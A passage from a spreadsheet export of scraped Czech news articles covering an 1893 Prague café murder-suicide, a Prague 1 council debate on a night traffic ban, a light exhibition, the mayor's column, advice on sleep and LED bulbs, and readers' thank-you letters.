ní nikoho nepouštěli. „ Subotič odvětil na pohled lhostejně: ‚Musím zítra na cesty, a proto se chci s milostpaní rozloučit.‘ Když jej hospodyně ani po těchto slovech nechtěla pustiti do pokoje, odstrčil ji stranou, vnikl rychle dovnitř a zavřel za sebou dveře na klíč,“ popisovaly další události Národní listy. Netrvalo dlouho a domem třeskly dva výstřely. Zaměstnanci v čele s hospodyní Rittbergerovou se nejprve pokusili vylomit dveře. Pak rozbili okno vedoucí z chodby do bytu majitelky. Jeden z pikolíků se protáhl dovnitř a konečně otevřel zevnitř uzamčené dveře. Zaměstnancům kavárny se naskytl hrůzný pohled. Josefina Angerová ležela bezvládně na posteli, u jejích nohou Subotič . Oba měli prostřelenou hlavu a v bezvědomí zápasili se smrtí. MUDr. Leo Hutschneger, jenž shodou okolností trávil čas v kavárně, rychle vyhodnotil situaci. Bylo zjevné, že Subotič střelil Josefinu Angerovou z bezprostřední blízkosti do pravého spánku, poté obrátil zbraň proti sobě. Oběma uvízla kulka v mozku. Ačkoli ještě žili a slabě, přerývaně dýchali, jejich stav byl beznadějný. První zemřela Josefina Angerová. Alexander Subotič skonal o několik minut později. Na podlaze zůstal malý šestiranný revolver. „Trčely v něm zbylé čtyři kule,“ konstatovaly věcně Národní listy. Ulice plná klepů A bylo zde ještě něco – dopis na rozloučenou. Našel se v kapse Subotičova kabátu. Nešťastný pisatel v něm proklínal všechny, kteří jeho lásce bránili a jeho milovanou přesvědčovali, aby od sňatku ustoupila. „Moje čistá láska ospravedlní můj čin před Milosrdným Bohem,“ zakončil Alexandr Subotič svou zpověď. Jenže Prahou , jak bylo v podobných chvílích zvykem, se začaly šířit klepy, které nacházely pro mužův milostný vztah k ženě starší o plných čtrnáct let i tragický čin, jenž následoval, jen jedno jediné vysvětlení. Subotič byl prý až po uši zadlužen (údajně šlo o 4 000 zlatých) a ve sňatku s bohatou vdovou viděl jedinou šanci, jak situaci vyřešit. „Když pak příbuzní i služebnictvo přiměli paní Angerovou, že své zasnoubení odvolala, stal se stav Subotiče zoufalým. Na sňatek nemohl pomýšleti, byť lásku ke staré paní sebevíce předstíral,“ líčily dál Národní listy. A tak, „když Subotič seznal, že veškeré dobře vypočtené plány se mu zhatily, že nemůže věřitele uspokojiti…, odhodlal se, že sprovodí ze světa sebe i paní Angerovou“. Na podobné spekulace reagoval vrahův bratr Jiří Subotič. „Tvrzení, že můj nešťastný bratr Alexandr Subotič nalézal se v neutěšených finančních poměrech a že proto donutiti chtěl paní K. Angerovou ku sňatku manželskému, jest pouhou pomluvou, neboť bratr můj měl v mém závodě výhodné a neodvislé postavení,“ napsal v dopise českým i německým redakcím pražských deníků. „Ještě bezdůvodnější jest pověst, že měl můj bratr 4 000 zlatých směnečních dluhů, z nichž sňatkem vybřednouti se snažil. Pravdou jest pravý opak, totiž, že můj ubohý zaslepený bratr dobře znal nepříliš utěšené hmotné poměry paní Angerové, neboť mu o nich sama vyprávěla a já sám spolehlivě jsem ho o všem zpravil, neboť jsem byl dlouholetým přítelem kavárníka p. Angera a znal jsem jeho obchodní podniky,“ dodal Jiří Subotič s tím, že Josefina Kateřina Angerová podepsala před časem směnku na 10 000 zlatých, kterou nebyla s to splatit. Jenže přesvědčujte pražskou ulici. Ví své. Ostatky Josefiny Angerové byly převezeny do rakouského Lince. Nebohá žena odpočívá vedle svého muže. Ulice Na Příkopě s kavárnou Central , na jejímž místě dnes stojí Dětský dům Netrvalo pak dlouho, když Josefina Angerová rodině a blízkým oznámila, že vyhověla naléhání mladšího milence a bude se vdávat V dubnu 1893 došlo v kavárně Central k tragédii. Její majitelku Josefinu Kateřinu Angerovou zastřelil prodejce uherského vína Subotič Subotič pracoval pro svého bratra Jiřího. Osudného rána odešel z bytu, který společně s matkou obývali v Mánesově ulici na Vinohradech Autor: Text: Dan Hrubý, autor Pražských příběhů Foto: Archiv Pražských příběhů Autor person Dan Hrubý</t>
  </si>
  <si>
    <t>19000</t>
  </si>
  <si>
    <t>20241101_162_3244477407_879af6d51eaf11226789.html</t>
  </si>
  <si>
    <t>879af6d51eaf11226789</t>
  </si>
  <si>
    <t>Místní parlament</t>
  </si>
  <si>
    <t>Místní parlament Hlavním tématem časopisu je Zákaz nočního vjezdu do centra. Zastupitelé (kromě REZIDENTI 1) odpověděli na otázku: Jste příznivci zákazu nočního vjezdu do centra? Myslíte si, že má smysl? Piráti a občané z Prahy 1 Zákaz nočního vjezdu do centra – pro klid, zdraví a důstojnost obyvatel Jako zastupitelé občanů Prahy 1 plně podporujeme zákaz nočního vjezdu do centra. Obyvatelé naší městské části mají právo na klidný spánek a zdravé životní prostředí. Neustálý hluk z noční dopravy a alkoholového turismu jim brání v základní potřebě odpočinku, který je klíčový pro jejich duševní zdraví a pohodu. Kvalitní spánek a možnost žít v klidu nejsou jen otázkou komfortu, ale základním lidským právem, které bychom měli chránit. Moderní turismus by měl respektovat potřeby místních obyvatel a nemá být zaměřen na alkoholové zážitky, které městu přinášejí více škody než užitku. Noční nepořádek, hluk a výtržnosti negativně ovlivňují kvalitu života obyvatel a narušují jejich právo na důstojné prostředí. Ochrana zdraví a práv občanů musí být prioritou, zejména v tak citlivých oblastech, jako je centrum Prahy . Abychom mohli účinně chránit práva našich obyvatel a zlepšit kvalitu života v centru, potřebujeme větší podporu nejen od hlavního města, ale i od ostatních městských částí. Praha 1 sama nemá pravomoc vytvářet vyhlášky, které by tyto problémy řešily. Jednotná spolupráce mezi městskými částmi a magistrátem je nezbytná k zavedení opatření, jako jsou omezení nočního vjezdu, dostatečné parkovací kapacity, snížení průjezdnosti, regulace sdílených koloběžek či řešení problémů s hlukem a světelným či vizuálním smogem. Jen tak můžeme zajistit udržitelné, zdravé a bezpečné prostředí pro naše občany. Chtěli bychom povzbudit všechny občany Prahy 1 , aby zůstali aktivní a hlasití při ochraně svého okolí a kvality života. Vaše názory jsou pro nás nesmírně důležité. Společně můžeme naše město dále rozvíjet jako místo, kde je radost žít – s ohledem na zdraví, klid a důstojnost každého z nás. Ivana Antalová ODS ODS Praha 1 dlouhodobě podporuje omezení zbytné dopravy na Starém Městě, které místním obyvatelům vadí a je především v nočních hodinách bezesporu krajně rušivým vlivem pro život. Víme ale také, že při omezení je důležitá volba nástroje, kterým ho chceme dosáhnout, a ten současný považujeme za neefektivní. Jednoduše řečeno, „značka není zeď“ a schopnost vymáhat omezení vjezdu v nočních hodinách je nízká. Jediným skutečně funkčním řešením je podle našeho názoru systém bezpečnostně-dopravních sloupků, které umožní vjezd všem rezidentům a dalším oprávněným vozidlům (zejména jde o složky IZS) a fyzicky zabrání vjezdu ostatním. ODS měla na radnici od roku 2014 v kompetenci resort dopravy a tehdejší radní Richard Bureš připravil komplexní projekt ochrany Starého Města , získal pro něj i podporu a zdroje z rozpočtu hlavního města Prahy . Proto nás mrzí, že tento ambiciózní plán byl v roce 2019 jednostranně zastaven na základě pokynu tehdejšího radního za Prahu Sobě Adama Scheinherra . A ani současný člen Rady HMP zodpovědný za dopravu Zdeněk Hřib projekt podporovat nechce. Naší koalici se proto podařilo pouze prosadit zákaz formou dopravního značení, názor obyvatel postižené části Prahy 1 je ale jednoznačný: hluku neubylo. Naše podpora tomuto kroku je dána spíše samotným principem, tedy vyjádřením snahy o ochranu centra. Naděje na úspěch ovšem vysoké nebyly. K městské policii máme v mnoha ohledech výhrady. V tomto případě je však nutné pochopit, že její kapacity nemohou v nočních hodinách sloužit jako „živá zeď“ okolo celého Starého Města. Její příslušníci mají jiné povinnosti a úkoly a není fyzicky možné, aby tento úkol zcela zastali. Pro obyvatele ulic postižených noční dopravou tedy stále máme jediné řešení: až najdeme podporu ve vedení hlavního města, pokusíme se projekt sloupků znovu prosadit. Nic lepšího bohužel k dispozici není. Antonín Berdych TOP 09 Bezohlední hulváti u nás nemají co dělat Jsme velmi rádi, že se po pár letech a několika kotrmelcích podařilo prosadit zákaz vjezdu do části Starého Města v nočních hodinách. Přesto je noční uzávěra části Starého Města mimořádným opatřením, které by do města vlastně nemělo patřit. Normálně ne. Jenže Staré Město , či spíše celá Praha 1, už dávno není normální město, kde po desáté chcípl pes a na ulici se sporadicky objeví nanejvýš lidé, kteří se vracejí domů z odpolední směny, či jeden všem známý místní opilec. Ne, naše ulice, a zejména Staré Město , se stalo kolbištěm všech, kdo si chtějí v České republice „užít“. Pomiňme dnes alkoholový turismus či hluk z restaurací i předzahrádek. To je také důležité, ale o tom jindy. Jedním z velmi obtěžujících zdrojů hluku na Starém Městě jsou lidé, kteří túrují silná hlučná auta mezi obytnými domy, v oblasti, kde stále ještě žijí naši občané. Druhým zdrojem hluku z aut jsou různé taxislužby, jejichž vozy projíždějí městem v naději, že naberou klienty. Pokud někdo z nich zastaví čekaje na klienta, ostatní troubí, aby nepřekážel. A to všechno uprostřed noci, kdy normální lidé spí. Rozhodli jsme se proto a prosadili jsme zákaz vjezdu do té části Starého Města , kde frekvence a bezohledné chování některých návštěvníků skutečně přesahuje všechny meze. Není to boj s motoristy, kteří by snad v klidu jeli domů či z restaurací. Je to boj proti bezohledným hulvátům, kteří vůbec neberou ohledy. Nikdy a na nikoho. A to nemůžeme připustit. Proto ten zákaz. Jistě. Mají do jisté míry pravdu i ti, kteří říkají, že vymáhání takového zákazu je složité a ne vždycky se daří. Jsme si toho vědomi. Proto žádáme na hlavním městě, aby městská policie konala a tento zákaz vymáhala. Stejně tak policie státní. A nepřestaneme, dokud se situace nezlepší. Jen proto, že něco není snadné, to nenecháme plavat! Terezie Radoměřská My, co tady žijeme Redakce radničních novin přišla s novým nápadem. Navrhuje klubům určité téma, ke kterému se jednotlivá politická uskupení zastoupená v zastupitelstvu mají možnost vyjádřit. Téma pro toto číslo zní, jestli jsme příznivci zákazu vjezdu aut do centra. Na celou show, která byla okolo omezení vjezdu do lokality kolem ulice Dlouhá, máme názor, který se už potvrdil. Je to poučka starých právníků: Nemůžete- -li vymáhat dodržování jakéhokoli nařízení, je lepší ho raději nezavádět. Úspěšný boj s hlukem má smysl s armádou strážníků v zádech a rychlým vyřizováním správního řízení s těmi, kteří omezení poruší. Ale život na území Prahy 1 má i úsměvné, spíš můžeme říci doslova legrační momenty, jak se nám občanům prezentuje naše jedničková radnice. Před několika dny jsme dostali do schránek leták s názvem Plánuj Jedničku. Leták obsahuje informaci, ve které je nám občanům slibováno cosi způsobem, jako by šlo o loterii se stíracími losy. Doslova si tam přečteme: Až milion korun můžeš získat na svůj projekt, který zlepší život v Praze 1 . Lákání končí výzvou: I tvůj sen se může stát realitou. Milí sousedé, takže to vypadá, že stačí někam poslat milion korun a z chodníků zmizí koloběžky. Proč radnice Prahy 1 ještě nevzala milion korun, aby bydlící mohli zaparkovat, když už si platí stání v zónách placeného stání? Podle letáku bude stačit zamávat milionem a hned bude opraveno těch několik stovek neobydlených bytů, co jsou ve správě Prahy 1 . Aby toho nebylo málo, leták obsahuje i fotografie dvou rozesmátých pánů. Věříme, že pan participátor a pan předseda celkem nadbytečného výboru se nám na letáku nesmějí. Oni to myslí vážně. A to už k smíchu opravdu není. Navíc, jak se budou blížit zase volby, bude to s rozesmátými pány v našich poštovních stránkách stále horší. MCTŽ Naše Praha 1 Marnost nad marnost My, rezidenti zvolení rezidenty k našemu zastupování věcí komunálních, máme na městských částech dle zákona úžasné pravomoci navrhovat, občas i schválit, ale už málo vymáhat. Můžeme prosazovat zákazy vjezdu, skvělé systémy parkování, omezování pivních tahů noční Prahou , Airbnb, zákazy koloběžek, leč kdo to bude kontrolovat a vymáhat? Takřka nikdo. Ony totiž represivní složky pod naši MČ nespadají. Náš noční zákaz vjezdu je krásnou ukázkou toho, jak i sebelepší nápad dotažený do vítězného konce může být prozatím Pyrrhovo vítězství. Noční hluk v ulicích totiž trápí hlavně nás, rezidenty centra, vyhlášených ulic Dlouhá, Dušní, Smetanovo nábřeží a mnohých dalších. A když se vypracuje návrh zklidnění, je třeba ho kvůli malichernostem zrušit, protože si ta zpropadená „jednička“ nebude dělat, co chce! Ale my jsme se nevzdali. My jsme po tři čtvrtě roce ty „zásadní nedostatky“ odstranili a opatření obecné povahy konečně prošlo, značky se zlegalizovaly a nastal v naší krásné pražské památkové rezervaci klid. Nebo ne? NE a NE. Když totiž někdo řekne nahlas „Když si to ta jednička vyhádala, ať si to taky sama hlídá“, tak to máme asi smůlu. Strážců zákona je málo, práce je moc, tak se stačí noc co noc podívat do našich ulic. Mladí chlapci v nadupaných řvoucích kárách se nám ulicemi ve tři ráno prohání nadále, dokonce i nadupaná motorka zpestří náš spánek. Občas projede nějaká ta hlídka, ale to moc tu šňůru taxikářů v Dušní nerozhází. Je to smutný příběh, protože když ten, co o tom rozhoduje, si v tichu spinká v Prokopském údolí, nemá moc zájmu o naše klidné spaní. A řešení? Za desítky milionů namontovat výsuvné sloupky, nebo vyměnit pár politiků ve vedení města. Vojtěch Ryvola, radní pro dopravu Prahy 1 Klub PRAHA 1 SOBĚ a Zelení Noční zákaz vjezdu do Dlouhé ulice a jejího okolí jsme podporovali od samého začátku, i proto jsme v minulém roce připravili a prosadili usnesení zastupitelstva na jeho podporu, když se primátor Bohuslav Svoboda rozhodl zakročit proti snaze úřadu o realizaci tohoto opatření. Vyznačit oblast Starého Města , kam smí po desáté večer jen dopravní obsluha, se nakonec podařilo. Je to dobrý začátek, ale hotovo ještě nemáme. Vzhledem k tomu, že zákaz platí i pro taxi, které by jelo hledat zákazníky (jako takové nesplňuje definici dopravní obsluhy), další kroky musí prostě jen směřovat k efektivnějšímu vymáhání platných pravidel. I tady totiž platí, že existující pravidla dostačují a stačí je „jen“ vymáhat, a že většinu nešvarů dnes dokáže vyřešit rázná a sebevědomá exekutiva a tah na branku. Tedy to, co u vedení naší radnice postrádáme. Je to dobře vidět třeba na příkladu stromů ve městě. Vzpomínáte si, jak některé ze stran v posledních volbách slibovaly novou výsadbu do našich rozpálených ulic? Jenže ať hledáme, jak hledáme, nové stromy nikde. Někdo může namítnout, že dva roky jsou příliš krátká doba na takový projekt, jenže ony nejsou na obzoru ani žádné plány budoucího ozelenění, žádné žádosti o vyjádření zúčastněných orgánů, žádné projednávání prvotních návrhů a skic na komisích… Vidíme jen centrum města, které je zejména v letních měsících stále méně k životu. Kdy s tím začnou? Zase až před volbami? PRAHA 1 SOBĚ a Zelení Článek V polovině volebního období JUDr. Pavla Marce, zastupitele MČ Praha 1 (klub Praha 1 Sobě a Zelení), si můžete přečíst na → www.praha1.cz/cl-p-marc REZIDENTI 1 Podzim ve znamení participace Ve volebním programu jsme měli důraz na komunikaci s občany a participaci, což také důsledně plníme. V říjnu proběhlo poslední participační setkání nad podobou parku Kampa . Do participace se prostřednictvím anket a osobních rozhovorů zapojilo 564 lidí, většina z nich byla z Prahy 1 . I když názor na to, jak má Kampa vypadat, není mezi uživateli parku jednotný, podařilo se (po mnoha desítkách let) nalézt kompromis, který se lidem i zástupcům místních sdružení a podnikatelů líbí. Pokud půjde vše, jak má, s rekonstrukcí by se mohlo začít v roce 2025. Ukončeno bylo také výběrové řízení na revitalizaci dětského hřiště Lannova, kde se do participace zapojilo více než sto lidí. Konečný návrh je dílem původního architekta Zdeňka Sendlera, na hřišti se vymění nevyhovující povrchy, přibudou nové herní prvky a bude zastíněno pískoviště. Na oblíbené hřiště v novém se můžete těšit už příští rok na jaře. V říjnu se uskutečnilo také participační setkání nad možnou podobou dětského hřiště ve Vlašské. Minimálně do konce října se zde budou sbírat podněty od lidí, kteří na hřiště chodí. Vaše připomínky a nápady pak budou zohledněny v konečném návrhu. Zároveň se zde již buduje nový workout (venkovní posilovna), na kterou přispěl magistrát. Do konce října také běží participační výzva, do které se mohou zapojit všichni občané Prahy 1 . Podařilo se nám totiž po mnoha letech diskuzí na toto téma prosadit participativní rozpočet. Svoje návrhy projektů (celkem až tři na jednoho člověka) můžete podávat prostřednictvím webu https://planuj.praha1.cz/participativni-rozpocty/, nebo písemně. Zároveň běží také školský participační rozpočet. Těšíme se na vaše podněty a další setkávání s vámi. Na vašich názorech nám opravdu záleží. Vaši REZIDENTI 1 Kateřina Klasnová Martin Motl (pozn.: Obsahuje příspěvky, které byly dodány do uzávěrky magazínu. Příspěvky nevyjadřují stanovisko redakce a za jejich obsah ručí jednotlivá politická uskupení.)</t>
  </si>
  <si>
    <t>20241101_163_3244273709_2ad82dcde9fc3a2240eb.html</t>
  </si>
  <si>
    <t>2ad82dcde9fc3a2240eb</t>
  </si>
  <si>
    <t>Třetí ročník projektu „Světla vyprávějí…“ přináší do Žlutých lázní fascinující vesmírný zážitek</t>
  </si>
  <si>
    <t>Třetí ročník projektu „Světla vyprávějí…“ přináší do Žlutých lázní fascinující vesmírný zážitek Světelný park „Světla vyprávějí…“ se již potřetí vrací do Žlutých lázní v Praze . Více než stovka světelných soch a objektů tvořená čtyřmi sty tisíci světly ponese v letošní podzimní a zimní sezóně název „Zvonkova cesta vesmírem.“ Přináší ohromující podívanou inspirovanou příběhem pohádkové postavy Zvonka. Tento kouzelný průvodce Zvonek vezme malé i velké návštěvníky na nezapomenutelnou cestu tajemstvími vesmíru. Unikátní výstavu otevře areál od 1. listopadu 2024 do 31. ledna 2025 každý den po setmění. „Zvonkova cesta vesmírem“ zahrnuje planety, hvězdy, Slunce, kosmické lodě i astronauty a nabízí jak úchvatnou světelnou podívanou, tak i vzdělávací interaktivní prvky. Návštěvníci se prostřednictvím moderních technologií a animací seznámí s nejnovějšími vědeckými poznatky o vesmíru, které jsou zpracovány zábavnou a hravou formou, což zejména děti vtáhne do dobrodružství plného objevů. Spojení Vánoc s vesmírem Výstava propojuje vánoční atmosféru s kosmickými motivy. Betlémskou hvězdu zde symbolizuje kometa, která provází návštěvníky na cestě nekonečným prostorem, a na návštěvníky čeká také unikátní vesmírný strom splněných přání. Tento prvek propojuje tradiční vánoční symboliku s inovativními světelnými instalacemi. Ruční tvorba světelných soch: Umění, design a jedinečnost v každém detailu Světelné expozice „Světla vyprávějí…“ jsou zcela unikátní zejména tím, že jejich téma a zpracování respektují a doplňují místo, ve kterém jsou instalovány. Všechny světelné sochy a objekty jsou ručně vyráběny v české rodinné firmě Decoled pod vedením majitelky Evy Poláčkové. Tým zkušených designérů a řemeslníků společně pracuje na tom, aby každé dílo mělo svou jedinečnou tvář. Kreativní nápady jsou pečlivě zpracovávány po celý rok, aby se v zimních měsících mohly proměnit v ohromující světelné instalace. Každý vystavený kus je originální a nese rukopis talentovaných řemeslníků, kteří vdechují těmto dílům život. Ekologický přístup a interaktivní zážitky Celá výstava je navržena s důrazem na udržitelnost. LED diody a další světelné prvky jsou energeticky úsporné, a mnohé dekorace jsou vyrobeny z recyklovatelných plastů pomocí nejmodernějšího velkoplošného 3D tisku. Interaktivní prvky umožní návštěvníkům hravou formou objevovat vesmírná tajemství a díky environmentálnímu přístupu má expozice minimální dopad na životní prostředí. Odborná spolupráce „Zvonkova cesta vesmírem“ vznikla ve spolupráci s astronomy z Hvězdárny Žebrák a dalšími odbornými institucemi, což zajišťuje autenticitu a vzdělávací hodnotu expozice. Návštěvníci se mohou těšit nejen na vizuální zážitek, ale i na poutavé informace o vesmíru. Výjimečné místo pro sváteční setkávání Světelnou expozici Světla vyprávějí… připravila česká rodinná společnost Decoled . „Světla vyprávějí…“ nejsou jen vizuální podívanou, ale především místem, kde se lidé setkávají a společně sdílejí kouzelnou atmosféru svátků. „Naším přáním je nejen rozzářit veřejný prostor, ale také vnést světlo a inspiraci do života lidí. Chceme, aby každá expozice vkusně a citlivě kultivovala okolí a zároveň respektovala tradice a ducha místa, kam je zasazena. Letos budou naše světelné parky na patnácti místech po celé Evropě a těší nás, že mohou přinést radost všem,“ říká Eva Poláčková, majitelka společnosti Decoled . Zveme vás k jedinečnému zážitku Světelná expozice ve Žlutých lázních je příležitostí strávit volný čas netradičně a objevovat ztvárněné krásy vesmíru v klidném prostředí přímo u Vltavy . Výstava je otevřena denně od 1. listopadu 2024 do 31. ledna 2025. „Výstava nabízí možnost krásné zimní procházky na břehu Vltavy v areálu, který je jinak v tomto období zavřený. Zveme všechny, aby si přišli užít spojení s přírodou u zimní řeky, spolu s prohlídkou originálních instalací a vychutnali si třeba rodinný podvečer s vesmírnou atmosférou se sklenicí svařeného vína nebo horké čokolády,“ zve Jan Dell , ředitel areálu Žluté lázně v pražském Podolí . Místo konání: Otevírací doba: Areál Žluté lázně Denně (po-ne) 16-21 hodin Podolské nábřeží 3/1184 140 00 Praha Více informací na: https://svetlavypraveji.cz/praha Světelnou expozici Světla vyprávějí… připravila česká rodinná společnost DECOLED . Již více než čtvrt století zdobí světly města a obce v Česku i zahraničí. Tvoří tematické světelné dekorace obchodních center, vánočních trhů a světelných parků. Vyrábí a prodává vánoční světla a dekorace. Prostě žije Vánoci po celý rok, a to už 27 let. expozice Vánoce zima Autor: red</t>
  </si>
  <si>
    <t>69</t>
  </si>
  <si>
    <t>109</t>
  </si>
  <si>
    <t>20241101_164_3245432879_c90a2b68acb1245a8d1e.html</t>
  </si>
  <si>
    <t>c90a2b68acb1245a8d1e</t>
  </si>
  <si>
    <t>Slovo starostky</t>
  </si>
  <si>
    <t>Slovo starostky Vážené dámy, vážení pánové, milí sousedé a sousedky, léto se zhouplo do podzimu a ten u nás ve městě bývá velmi bohatý na kulturní události. Hned začátek listopadu přivede do Prahy jeden z nejzajímavějších mezinárodních hudebních festivalů, které u nás máme. Od 3. do 20. 11. přinese 28. ročník festivalu Prague Sounds zajímavý mix jazzu, moderní vokální hudby, hip hopu i klasiky. Z tak široké nabídky si určitě vyberou všichni. Myslím, že pokud někoho milujete, chcete o dané osobě vědět co nejvíc. A protože milujeme Prahu , určitě se všichni sejdeme v KS Tomáš na přednášce Jaroslavy Náprstkové o tom, jak se lidé v Praze v minulosti bavili – o hospodách, hostincích, stolních společnostech i kabaretech. Kdo nechce jen poslouchat, ale bavit se aktivně, nenechá si jistě ujít tradiční Malostranský candrbál. Hudbymilovní sousedé a sousedky se určitě sejdou na benefičním koncertě Jaroslava Svěceného nebo na oblíbených Kostelních slavnostech, tentokrát s podtitulem Alchymie v hudbě. Pak už je do Vánoc jen skok, kdo z vás tedy touží mít vlastnoručně vyrobený adventní věnec, může se zúčastnit workshopu v Jedničce a pod vedením šikovných rukou si takový stvořit. Ani my na radnici nezahálíme, usilovně pracujeme na přípravě rozpočtu, rozjeté jsou participativní rozpočty i dotace na odstraňování graffiti, rozjíždí se dlouho plánované opravy našich školních budov, s magistrátem pracujeme na omezení krátkodobého ubytování a zákazu obtěžujících pub crowlů, organizovaných turistických alkoholových tahů městem. To a mnoho dalšího nám leží na stole. Věřím však, že si najdeme čas i na procházky naší městskou částí. Vždyť svoje město nejlépe prožijeme, ochutnáme-li ho podrážkami vlastních bot. Jak krásné jsou platany na Petrském, když se zbarví do tónů podzimu, jak úžasnou kulisu dá celé Malé Straně barevný Petřín , kdo by s podzimními večery nezašel na náplavku Vltavy , aby v líně se povalujících chuchvalcích mlhy pozoroval skrytou krásu řeky. Musím se vám přiznat, že aroma listí, rozšlapaného a tlejícího mezi kočičími hlavami ulic našeho města, je vůně, kterou mám pevně spojenou s tichými, meditativními chvílemi procházek po Velkopřevorském náměstí . Je to vůně domova, odpočinku a radosti. Autor: Přeji i vám krásný, barevný, voňavý podzim. Vaše Terezie Radoměřská Autor person Terezie Radoměřská</t>
  </si>
  <si>
    <t>20241101_165_3244313112_33e6f0e4fa4d88509ccf.html</t>
  </si>
  <si>
    <t>33e6f0e4fa4d88509ccf</t>
  </si>
  <si>
    <t>Po změně času svítíme více. Jak lépe spát a ještě uspořit?</t>
  </si>
  <si>
    <t>Po změně času svítíme více. Jak lépe spát a ještě uspořit? Michaela Holubová 1.11.2024 S příchodem kratších dnů a delších tmavých večerů a rán je důležité udržet pravidelný spánkový režim. Pomoci může každodenní procházka, cvičení nebo teplá koupel. Odborníci doporučují používat v ložnici a dětském pokoji žárovky s teplou bílou barvou, které před spaním navodí pocit klidu a relaxace. Bude se svítit více, což znamená i vyšší účty za energie. Čekají nás dřívější západy slunce a temnější rána, při kterých bude těžší vstávat z postele. Abychom mohli fungovat, budeme muset více využívat umělé světlo. To však znamená zvýšenou spotřebu energie, která se může nenápadně projevit i v našich peněženkách. Jak zlepšit kvalitu spánku a které žárovky doporučují odborníci? Pro naše zdraví je nejpřirozenější, když se probouzíme s ranním světlem a usínáme, když venku nastane tma. Je také důležité dodržovat pravidelný spánkový režim – chodit spát a vstávat ve stejnou dobu každý den. Změny času však mohou tento rytmus narušit, což může ovlivnit náš spánek i celkovou pohodu. „Změny času mohou narušit naši spánkovou rutinu, způsobit problémy se spánkem a narušovat náš biorytmus, což může být doprovázeno ospalostí, únavou nebo například i dezorientací,“ říká lékárnice Tatiana Kocúrková. Že má smysl přemýšlet nad designem lustrů, ale u žárovek už o nic moc nejde? Chce se říct – ba naopak. Pozor na biorytmus Při narušeném biorytmu je klíčový především dostatečný a kvalitní spánek. K jeho dosažení je nezbytný pohyb, ať už ve formě 30minutové procházky, běhu nebo fitness tréninku. Odborníci doporučují omezit alkohol i modré světlo, které vyzařují především mobilní telefony: „ Alkohol narušuje tzv. REM fázi spánku, což je snová fáze nezbytná pro naši regeneraci. Je důležité odložit všechna elektronická zařízení, která přitahují pozornost. Doporučuje se chladnější tmavá místnost, protože melatonin, spánkový hormon, je produkován epifýzou výhradně ve tmě,“ pokračuje Kocúrková a dodává, že pomoci může i teplá koupel či aromaterapie. Na barvě světla záleží Výběr správného osvětlení může zásadně ovlivnit atmosféru a funkčnost vašich prostor. Je důležité rozlišovat barvu světla, kterou jednotlivé žárovky poskytují. Například neutrální bílá barva světla je ideální pro kuchyně, koupelny nebo pracovní prostory. Připomíná denní světlo a je vhodná pro běžné činnosti. Studená bílá barva světla je zase ideální tam, kde je potřeba vysoká koncentrace a pozornost, například v kancelářích, kuchyňských linkách, dílnách nebo garážích. Před spaním se doporučuje používat žárovky s teplou bílou barvou. Máte doma hodně svítidel? Tak to už bude úspora znát… Kolik vydrží klasická žárovka? Více světla bude znamenat i zvýšené energetické náklady. Právě LED žárovky se v posledních letech staly synonymem úspory energie a dlouhé životnosti. Zatímco tradiční žárovky vyžadují velké množství elektrické energie a mají krátkou životnost, LED technologie přináší zcela nový standard efektivního osvětlení. Jaké důvody zvážit při nákupu žárovek? Častější zapínání světel po změně času by nás mělo přimět zamyslet se nad tím, o kolik nás to bude stát více a jak bychom mohli ušetřit na zbytečných nákladech. Mnoho lidí se stále domnívá, že LED žárovky jsou v porovnání s klasickými příliš drahé. Dnes však najdeme cenově dostupné LED žárovky, které navíc nabízejí výrazně delší životnost než klasické nebo halogenové. „Při běžném používání LED žárovky spotřebujete kolem 4Wattů, zatímco tradiční žárovky srovnatelného světelného výkonu spotřebují až 60Wattů. Tento rozdíl ve spotřebě energie může během zimy přinést výrazné snížení nákladů. Klasické žárovky mají navíc nepoměrně kratší životnost, průměrně 1000 hodin, zatímco halogenové žárovky mají průměrně 2 000 hodin,“ říká Michal Pochyla ze společnosti EMOS . LED žárovky také prakticky nevydávají teplo, na rozdíl od tradičních žárovek, jsou proto znatelně bezpečnější. Zdroje informací: Sleep Foundation, National Institute of Environmental Health Sciences (NIEHS), EMOS , Harvard Health Foto: 1: Pixabay 2: 4,5W žárovka ve stylu vintage - Emos 3: Pixabay Právě v prodeji Autor: Michaela Holubová Autor person Michaela Holubová Rubrika transition_slide Lifestyle</t>
  </si>
  <si>
    <t>1040</t>
  </si>
  <si>
    <t>1710</t>
  </si>
  <si>
    <t>20241101_166_3245589451_47dc6d148acda0b66079.html</t>
  </si>
  <si>
    <t>47dc6d148acda0b66079</t>
  </si>
  <si>
    <t>přišlo do redakce</t>
  </si>
  <si>
    <t>přišlo do redakce Zakončení léta na Jitřence Rychlý nástup podzimu nám připomněl, že je letošní léto již za námi. Ale proč si léto nepřipomenout pohodou a něčím dobrým na zub? Proto jsme si jedno zářijové odpoledne pozvali na návštěvu paní Alenku, která nám hrou na akordeon vykouzlila příjemnou atmosféru. K příjemné hudbě patří i dobré jídlo a pití. Proto jsme se rozhodli, že si opečeme špekáčky. Počasí bylo nádherné, ale jakmile si všimlo, že chceme opékat, začalo nás zlobit deštěm. Nám to ale náladu nezkazilo a díky šikovným rukám našich zaměstnanců jsme o pěkné odpoledne nepřišli. Špekáčky jsme opekli venku na grilu a klienti si pak na nich mohli v zázemí domova v klidu pochutnat. Mastnotu „spláchli“ nealkoholickým pivem . Libá vůně opékaných špekáčků a příjemné lidové písničky se nesly domovem do pozdního odpoledne. Magdalena Kulhavá, sociální pracovnice Domácí hospic setkání děkuje všem dárcům Rádi bychom touto cestou poděkovali všem, kteří svými dary podporují náš Domácí hospic Setkání. Někteří z vás jsou s námi již od vzniku hospice, tedy jedenáctým rokem, a pravidelně nám projevujete svou štědrost. Moc si toho vážíme. Všechny dary, a především ty pravidelné, nám poskytují tolik potřebnou jistotu při plánování naší činnosti. Stále více si uvědomujeme, jak důležité je, aby o hospicové službě bylo slyšet a lidé mohli prožít poslední etapu života v kruhu své rodiny. Díky vaší podpoře jsme letos mohli zakoupit čtyři kyslíkové koncentrátory, které spolu s dalšími půjčujeme nejen našim pacientům, ale i široké veřejnosti. Je o ně opravdu veliký zájem. Ještě jednou děkujeme za veškerou vaši podporu. Pokud byste nás také chtěli podpořit, více informací najdete v sekci „Pro dárce“ na našich stránkách www.hospicrychnov.cz. Domácí hospic Setkání děti z dětského domova vyrazily na led Vedení dětského domova v Sedloňově a všichni zaměstnanci i děti by touto cestou rádi poděkovali Michalu Trubačovi a všem jeho kolegům, kteří mají v gesci zimní stadion v Opočně . Pan Trubač si určitě zaslouží velké poděkování za to, že umožnil dětem z domova zažít takovou radost a zábavu na ledě. Takové akce mohou mít obrovský pozitivní dopad na jejich životy. Proto ještě jednou děkujeme za zpestření nedělního 